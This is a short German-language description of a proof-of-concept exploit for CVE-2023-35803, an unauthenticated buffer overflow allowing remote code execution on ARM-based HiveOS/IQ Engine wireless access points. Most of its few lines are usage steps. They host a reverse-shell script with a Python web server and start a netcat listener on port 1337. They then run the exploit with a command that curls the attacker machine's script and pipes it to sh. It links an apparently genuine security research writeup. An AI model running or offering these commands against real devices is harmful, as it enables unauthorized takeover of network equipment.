
PoC-Exploit für CVE-2023-35803, ein nicht authentifizierter Pufferüberlauf in Aerohive HiveOS/Extreme Networks IQ Engine, der Remote-Codeausführung auf ARM-basierten drahtlosen Zugangspunkten ermöglicht.
PoC für ARM-basierte Access Points mit HiveOS/IQ Engine <10.6r2.
revshell, um auf deine Shell-Catcher-IP/Port zu zeigen.python3 -m http.servernc -lvnp 1337python3 poc.py <ip von ap> "curl <ip des Angriffsrechners>:8000/revshell|sh"Writeup hier: https://research.aurainfosec.io/pentest/bee-yond-capacity/
